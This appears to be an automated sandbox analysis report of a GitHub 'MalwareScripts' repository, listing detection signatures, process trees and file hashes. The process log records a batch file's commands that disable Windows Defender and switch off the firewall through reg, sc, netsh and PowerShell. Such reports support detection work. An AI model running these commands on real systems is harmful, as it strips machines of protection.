Analysis

  • max time kernel
    127s
  • max time network
    128s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    17/11/2024, 08:52

General

  • Target

    https://github.com/SantiagoPujana/MalwareScripts

Malware Config

Signatures

  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 58 IoCs
  • Suspicious use of SendNotifyMessage 32 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/SantiagoPujana/MalwareScripts
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3392
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x104,0x108,0x10c,0xd4,0x110,0x7ffafe10cc40,0x7ffafe10cc4c,0x7ffafe10cc58
      2⤵
        PID:2960
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2016,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2012 /prefetch:2
        2⤵
          PID:760
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1880,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2460 /prefetch:3
          2⤵
            PID:4500
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2144,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2572 /prefetch:8
            2⤵
              PID:2108
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3152 /prefetch:1
              2⤵
                PID:1088
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3132,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3208 /prefetch:1
                2⤵
                  PID:916
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4680,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3756 /prefetch:8
                  2⤵
                    PID:4412
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4828,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4512 /prefetch:8
                    2⤵
                      PID:644
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3868,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4868 /prefetch:8
                      2⤵
                        PID:4384
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4936,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5408 /prefetch:8
                        2⤵
                          PID:4864
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5008,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5436 /prefetch:8
                          2⤵
                            PID:2640
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5248,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4980 /prefetch:8
                            2⤵
                              PID:3932
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5260,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5360 /prefetch:8
                              2⤵
                                PID:2016
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5300,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5104 /prefetch:8
                                2⤵
                                  PID:3612
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5104,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5140 /prefetch:1
                                  2⤵
                                    PID:1280
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=980,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3144 /prefetch:8
                                    2⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:2536
                                • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                  1⤵
                                    PID:532
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                    1⤵
                                      PID:2760
                                    • C:\Windows\System32\rundll32.exe
                                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                      1⤵
                                        PID:1612
                                      • C:\Users\Admin\Desktop\ScreenMelter.exe
                                        "C:\Users\Admin\Desktop\ScreenMelter.exe"
                                        1⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        PID:4384
                                      • C:\Users\Admin\Desktop\FullMemory.exe
                                        "C:\Users\Admin\Desktop\FullMemory.exe"
                                        1⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        PID:992
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\win64.bat" "
                                        1⤵
                                          PID:396
                                          • C:\Windows\system32\reg.exe
                                            reg add HKLM\Software\Policies\Microsoft\WindowsDefender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                            2⤵
                                            • Modifies registry key
                                            PID:1704
                                          • C:\Windows\system32\reg.exe
                                            reg add HKLM\Software\Policies\Microsoft\WindowsDefender /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
                                            2⤵
                                            • Modifies registry key
                                            PID:2392
                                          • C:\Windows\system32\reg.exe
                                            reg delete HKLM\SYSTEM\CurrentControlSet\Services\WinDefend\Security /f
                                            2⤵
                                            • Modifies registry key
                                            PID:3248
                                          • C:\Windows\system32\gpupdate.exe
                                            gpupdate /force
                                            2⤵
                                              PID:3180
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell.exe Restart-Service -Name WinDefend -Confirm:$false -Force
                                              2⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:3752
                                            • C:\Windows\system32\sc.exe
                                              sc stop WinDefend
                                              2⤵
                                              • Launches sc.exe
                                              PID:4800
                                            • C:\Windows\system32\sc.exe
                                              sc query WinDefend
                                              2⤵
                                              • Launches sc.exe
                                              PID:2400
                                            • C:\Windows\system32\sc.exe
                                              sc delete WinDefend
                                              2⤵
                                              • Launches sc.exe
                                              PID:2480
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell.exe Set-NetFirewallProfile -Enabled False
                                              2⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:2596
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true
                                              2⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:1852
                                            • C:\Windows\system32\netsh.exe
                                              netsh advfirewall set allprofiles state off
                                              2⤵
                                              • Modifies Windows Firewall
                                              • Event Triggered Execution: Netsh Helper DLL
                                              PID:3692
                                            • C:\Windows\system32\netsh.exe
                                              netsh firewall set opmode mode=disable
                                              2⤵
                                              • Modifies Windows Firewall
                                              • Event Triggered Execution: Netsh Helper DLL
                                              PID:3456

                                          Network

                                                MITRE ATT&CK Enterprise v15

                                                Downloads

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                  Filesize

                                                  649B

                                                  MD5

                                                  073d2d1f5afb5732236e939c0f259453

                                                  SHA1

                                                  8bf64fccb5a35df236f322ce95de1dd19a31a5a1

                                                  SHA256

                                                  c8e860634b94e4a52bdc84987fb8311deaf0d6704fad629b8ff553a1a511069e

                                                  SHA512

                                                  21dc80ce515562eeb520463a43e84b5e26a3604504091c47c5ee377c06afe9d71d732f6ed4f952682828a78e986819585156e5fdd7e20309739b001f1e1f2530

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000019

                                                  Filesize

                                                  215KB

                                                  MD5

                                                  e579aca9a74ae76669750d8879e16bf3

                                                  SHA1

                                                  0b8f462b46ec2b2dbaa728bea79d611411bae752

                                                  SHA256

                                                  6e51c7866705bf0098febfaf05cf4652f96e69ac806c837bfb1199b6e21e6aaf

                                                  SHA512

                                                  df22f1dff74631bc14433499d1f61609de71e425410067fd08ec193d100b70d98672228906081c309a06bcba03c097ace885240a3ce71e0da4fdb8a022fc9640

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                  Filesize

                                                  2KB

                                                  MD5

                                                  9bd40c38355785a81c6710b7e96decf6

                                                  SHA1

                                                  091fa9e4c17177a764ac1160984decb8d8e08bb8

                                                  SHA256

                                                  0c73b86d0ab84ef87e670c8f7b4a5334b42dae4a6ca813dcc2b1f0ae7148db39

                                                  SHA512

                                                  ff4768953b7eb3f6838bfc885dc578e6efa8bd4a04892e843b9b866dc1677d1861dff816b3b0294592e70bcb7493aa724c81584d9da8806fdb06879ea66114f3

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                  Filesize

                                                  2KB

                                                  MD5

                                                  3bda54957329399e01369d366d01868b

                                                  SHA1

                                                  57b7c4ab48ee910bda91bab3d3ae3e938f0d0148

                                                  SHA256

                                                  c5cf894c14c37c6b34a9c32365767a53b73c1ad554664c980ffed693258b1757

                                                  SHA512

                                                  0221e125ee31169c12ad8dbaf27b3c09eabbb220a52c6ae8d332141c3f0223d037702dc058f582a86d92ba44819f9c25f18be7ae87f8b67dd5790a5ee6d79e20

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                  Filesize

                                                  2KB

                                                  MD5

                                                  d8d5b44fb839ede3d75feda67fa99c71

                                                  SHA1

                                                  4b633eee81202091940d2be98bfa1141bfc8754f

                                                  SHA256

                                                  e2c84b67be6e3a97126451d1d4073a8beb171b1df0df955e40a8a2c964c9f4f5

                                                  SHA512

                                                  6cc2d8ead16814a0828e4e52fbcbda4b2bed92805b68c4d07f7191fe292e34a514890a4e2e474f0c571a2cea65527c9e22eea0a863a0ccfe3aca556cefbe6641

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                  Filesize

                                                  2B

                                                  MD5

                                                  d751713988987e9331980363e24189ce

                                                  SHA1

                                                  97d170e1550eee4afc0af065b78cda302a97674c

                                                  SHA256

                                                  4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                  SHA512

                                                  b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  3f79900a8ee54ebbc79263af85798e2c

                                                  SHA1

                                                  202f1eea059c97cef8e0b9ed4ee6ceb482d917e5

                                                  SHA256

                                                  8d25b64ce714dd9f63176b2f6b9c01397c76e2193a8df988bee10a1520972256

                                                  SHA512

                                                  fae8934040cdab50f89fce1afb54bc2e912efef0f8ad9a3729a4f6344f6685b765b3ea2a2cdbbde245bde4f32c49454af2bc2739f4e33045292abac7a864911b

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  92d25c80f9e51b974164cf1cef8ff9ac

                                                  SHA1

                                                  edf7d0477c60b796fbe9bc6ea529730245a885d0

                                                  SHA256

                                                  1b989eeb235c944aa0d5faf07990ee47155d38e954a12d3ccbff34b6c83aba2b

                                                  SHA512

                                                  a74ccb4a283d48bbceab1f90dc59b800b9abd850ec6d5f5cea69c9c1e7b68086aa171bc018bec7e075e1f172f3b59e76611c3b0b4b504be3bc4e62e134927a7d

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  68103ea7a4503dd93424400eb8cf6685

                                                  SHA1

                                                  828412d712bcfeeb940bb7482230b8d1a67f0e40

                                                  SHA256

                                                  db7fd66761785e06b5ff0b7815b16484ec47d55419ea9a44e9b60289bf1b19ee

                                                  SHA512

                                                  9ee3db3df3e73edd20faa9bca68c958db89bdb19ec4113d6388524dd16885452a66c46a769fdc3b3cd46d73287cc3ff88bc3475bae6febc68c2d5229edad8253

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  21d3f83b943683f20d13b27b8555abbb

                                                  SHA1

                                                  3a0602b4b701ac3916abf990d1d48f754c87b75a

                                                  SHA256

                                                  8692a9c4971fdf97d106843159799f505cab152407a7d632c560eefa4c33e75a

                                                  SHA512

                                                  38197634ad5f4dda5d53d711ae2cdcf7fac7b6bb6c26e24dcf20790abde06c0dcff38ac3d332eed6c393d8cf311aa402d33f4e33072c81058a9b49b28f1910f0

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  da190c584ad1b88fcd51f04685dd218c

                                                  SHA1

                                                  1b5d7c1d5cfd2806d39fb80ca97d8c71b24d65eb

                                                  SHA256

                                                  2ae4d64370bb0154a140b94f709bb3cb555cf08b40caa4ea4da3d0d7890df39b

                                                  SHA512

                                                  0cf93ce7ad4190152c62d2d8661bb25a3feb6cf314fc79d93561088a974c3febbdd61bb287a02c1b7a7cfafa031bcee550238b3e4b9ce7224f9ac38dbf3a7a08

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  ba1d1bce374bf5d57dd33b02a9a13bf8

                                                  SHA1

                                                  47b8e855bb9e6b15f610240ff06e4bc9707780f0

                                                  SHA256

                                                  dc226f71609df0a7bec1ea2b4fbe5250205bddbac74a2e94684b5619b1c16348

                                                  SHA512

                                                  95b3b08818818c5c598e4ab52f913e13041b180e5e340993c9cae9391c368911064c3093fd743899206cd5a576b624ec116c27c170d5ca89a7217f4de656a865

                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                  Filesize

                                                  10KB

                                                  MD5
